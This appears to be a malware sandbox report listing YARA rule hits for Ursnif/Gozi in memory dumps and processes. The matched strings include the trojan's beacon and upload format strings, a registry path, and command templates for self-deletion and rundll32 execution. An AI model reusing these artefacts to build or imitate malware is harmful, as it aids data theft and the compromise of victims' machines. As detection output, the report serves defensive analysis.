00000059.00000003.822550991.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x86c:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x8ac:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xcf2:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x91f:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x9f5:$a6: http://constitution.org/usdeclar.txt 0xb7a:$a7: grabs= 0x104c:$a8: CHROME.DLL 0x9c9:$a9: Software\AppDataLow\Software\Microsoft\ 0x3a90:$a9: Software\AppDataLow\Software\Microsoft\ 0x3af0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3b50:$a9: Software\AppDataLow\Software\Microsoft\ 0x3bb0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3c10:$a9: Software\AppDataLow\Software\Microsoft\
0000001F.00000000.656463020.000001489BB00000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000058.00000000.802729381.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x86c:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x8ac:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xcf2:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x91f:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x9f5:$a6: http://constitution.org/usdeclar.txt 0xb7a:$a7: grabs= 0x104c:$a8: CHROME.DLL 0x9c9:$a9: Software\AppDataLow\Software\Microsoft\ 0x3a90:$a9: Software\AppDataLow\Software\Microsoft\ 0x3af0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3b50:$a9: Software\AppDataLow\Software\Microsoft\ 0x3bb0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3c10:$a9: Software\AppDataLow\Software\Microsoft\
0000001B.00000000.625911169.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000059.00000003.822358925.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000059.00000003.822358925.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x86c:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x8ac:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xcf2:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x91f:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x9f5:$a6: http://constitution.org/usdeclar.txt 0xb7a:$a7: grabs= 0x104c:$a8: CHROME.DLL 0x9c9:$a9: Software\AppDataLow\Software\Microsoft\
0000001B.00000000.630294105.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x86c:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x8ac:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xcf2:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x91f:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x9f5:$a6: http://constitution.org/usdeclar.txt 0xb7a:$a7: grabs= 0x9c9:$a9: Software\AppDataLow\Software\Microsoft\
00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x86c:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x8ac:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xcf2:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x91f:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x9f5:$a6: http://constitution.org/usdeclar.txt 0xb7a:$a7: grabs= 0x104c:$a8: CHROME.DLL 0x9c9:$a9: Software\AppDataLow\Software\Microsoft\
00000023.00000003.682832881.0000000003558000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000023.00000003.682832881.0000000003558000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x5d4:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x614:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xa06:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x687:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x750:$a6: http://constitution.org/usdeclar.txt 0x8d5:$a7: grabs= 0xf32:$a8: CHROME.DLL 0x724:$a9: Software\AppDataLow\Software\Microsoft\ 0x37f0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3848:$a9: Software\AppDataLow\Software\Microsoft\ 0x38a8:$a9: Software\AppDataLow\Software\Microsoft\ 0x3908:$a9: Software\AppDataLow\Software\Microsoft\ 0x3968:$a9: Software\AppDataLow\Software\Microsoft\
00000043.00000003.775181381.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000043.00000003.775181381.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x86c:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x8ac:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xcf2:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x91f:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x9f5:$a6: http://constitution.org/usdeclar.txt 0xb7a:$a7: grabs= 0x104c:$a8: CHROME.DLL 0x9c9:$a9: Software\AppDataLow\Software\Microsoft\
00000013.00000000.590960903.000002240CA50000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000058.00000003.803740044.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000058.00000003.803740044.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x86c:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x8ac:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xcf2:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x91f:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x9f5:$a6: http://constitution.org/usdeclar.txt 0xb7a:$a7: grabs= 0x104c:$a8: CHROME.DLL 0x9c9:$a9: Software\AppDataLow\Software\Microsoft\
00000023.00000000.680178718.0000000003020000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x5d4:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x614:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xa06:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x687:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x750:$a6: http://constitution.org/usdeclar.txt 0x8d5:$a7: grabs= 0xf32:$a8: CHROME.DLL 0x724:$a9: Software\AppDataLow\Software\Microsoft\ 0x37f0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3848:$a9: Software\AppDataLow\Software\Microsoft\ 0x38a8:$a9: Software\AppDataLow\Software\Microsoft\ 0x3908:$a9: Software\AppDataLow\Software\Microsoft\ 0x3968:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.344881693.0000000001318000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.344881693.0000000001318000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.344881693.0000000001318000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000004.00000002.814285126.0000021F457F9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.344788105.0000000001318000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.344788105.0000000001318000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.344788105.0000000001318000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.389768028.000000000119B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000013.00000000.576910703.000002240CA50000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000029.00000003.708468891.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000029.00000003.708468891.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x86c:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x8ac:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xcf2:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x91f:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x9f5:$a6: http://constitution.org/usdeclar.txt 0xb7a:$a7: grabs= 0x104c:$a8: CHROME.DLL 0x9c9:$a9: Software\AppDataLow\Software\Microsoft\ 0x3a90:$a9: Software\AppDataLow\Software\Microsoft\ 0x3af0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3b50:$a9: Software\AppDataLow\Software\Microsoft\ 0x3bb0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3c10:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.495247062.0000000001148000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000023.00000000.681232862.0000000003020000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000043.00000003.775368587.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000043.00000003.775368587.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x86c:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x8ac:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xcf2:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x91f:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x9f5:$a6: http://constitution.org/usdeclar.txt 0xb7a:$a7: grabs= 0x104c:$a8: CHROME.DLL 0x9c9:$a9: Software\AppDataLow\Software\Microsoft\ 0x3a90:$a9: Software\AppDataLow\Software\Microsoft\ 0x3af0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3b50:$a9: Software\AppDataLow\Software\Microsoft\ 0x3bb0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3c10:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000002.497852767.0000000001181000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000023.00000003.682410000.0000000003558000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000023.00000003.682410000.0000000003558000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x5d4:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x614:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xa06:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x687:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x750:$a6: http://constitution.org/usdeclar.txt 0x8d5:$a7: grabs= 0xf32:$a8: CHROME.DLL 0x724:$a9: Software\AppDataLow\Software\Microsoft\ 0x37f0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3848:$a9: Software\AppDataLow\Software\Microsoft\ 0x38a8:$a9: Software\AppDataLow\Software\Microsoft\ 0x3908:$a9: Software\AppDataLow\Software\Microsoft\ 0x3968:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000002.498174750.0000000001318000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000002.498174750.0000000001318000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x6c:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0xac:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x4f2:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x11f:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x1f5:$a6: http://constitution.org/usdeclar.txt 0x37a:$a7: grabs= 0x84c:$a8: CHROME.DLL 0x1c9:$a9: Software\AppDataLow\Software\Microsoft\
00000023.00000003.682621929.0000000003558000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000023.00000003.682621929.0000000003558000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x5d4:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x614:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xa06:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x687:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x750:$a6: http://constitution.org/usdeclar.txt 0x8d5:$a7: grabs= 0xf32:$a8: CHROME.DLL 0x724:$a9: Software\AppDataLow\Software\Microsoft\ 0x37f0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3848:$a9: Software\AppDataLow\Software\Microsoft\ 0x38a8:$a9: Software\AppDataLow\Software\Microsoft\ 0x3908:$a9: Software\AppDataLow\Software\Microsoft\ 0x3968:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x5d4:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x614:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xa06:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x687:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x750:$a6: http://constitution.org/usdeclar.txt 0x8d5:$a7: grabs= 0xf32:$a8: CHROME.DLL 0x724:$a9: Software\AppDataLow\Software\Microsoft\ 0x37f0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3848:$a9: Software\AppDataLow\Software\Microsoft\ 0x38a8:$a9: Software\AppDataLow\Software\Microsoft\ 0x3908:$a9: Software\AppDataLow\Software\Microsoft\ 0x3968:$a9: Software\AppDataLow\Software\Microsoft\
00000058.00000000.801073925.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000058.00000000.799390295.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0000001B.00000000.635166996.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x86c:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x8ac:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xcf2:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x91f:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x9f5:$a6: http://constitution.org/usdeclar.txt 0xb7a:$a7: grabs= 0x104c:$a8: CHROME.DLL 0x9c9:$a9: Software\AppDataLow\Software\Microsoft\ 0x3a90:$a9: Software\AppDataLow\Software\Microsoft\ 0x3af0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3b50:$a9: Software\AppDataLow\Software\Microsoft\ 0x3bb0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3c10:$a9: Software\AppDataLow\Software\Microsoft\
00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x5d4:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x614:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xa06:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x687:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x750:$a6: http://constitution.org/usdeclar.txt 0x8d5:$a7: grabs= 0xf32:$a8: CHROME.DLL 0x724:$a9: Software\AppDataLow\Software\Microsoft\ 0x37f0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3848:$a9: Software\AppDataLow\Software\Microsoft\ 0x38a8:$a9: Software\AppDataLow\Software\Microsoft\ 0x3908:$a9: Software\AppDataLow\Software\Microsoft\ 0x3968:$a9: Software\AppDataLow\Software\Microsoft\
0000001F.00000000.673085569.000001489BB00000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
Process Memory Space: Lx6.exe PID: 1172	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: Lx6.exe PID: 1172	Windows_Trojan_Gozi_fd494041	unknown	unknown	0x4cb3:$a5: filename="%.4u.%lu" 0x4fb1:$a5: filename="%.4u.%lu" 0xe3a60:$a5: filename="%.4u.%lu" 0xe3d5e:$a5: filename="%.4u.%lu" 0x2350cf:$a5: filename="%.4u.%lu" 0x236133:$a5: filename="%.4u.%lu" 0x25b709:$a5: filename="%.4u.%lu" 0x25ba07:$a5: filename="%.4u.%lu" 0x25d9f8:$a5: filename="%.4u.%lu" 0x25ea62:$a5: filename="%.4u.%lu" 0x477b:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xe3528:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x234bfb:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x25b1d1:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x25d524:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x46a8:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x4a69:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x4d6c:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe3455:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe3816:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe3b19:$a8: %08X-%04X-%04X-%04X-%08X%04X
Process Memory Space: Lx6.exe PID: 1172	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x4be2:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x4ee3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0xe398f:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0xe3c90:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x234bbb:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x234cfe:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x25b638:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x25b939:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x25d4e4:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x25d627:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x477b:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x4927:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xe3528:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xe36d4:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x234bfb:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x234d3d:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x25b1d1:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x25b37d:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x25d524:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x25d666:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x4c7f:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
Process Memory Space: powershell.exe PID: 4292	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
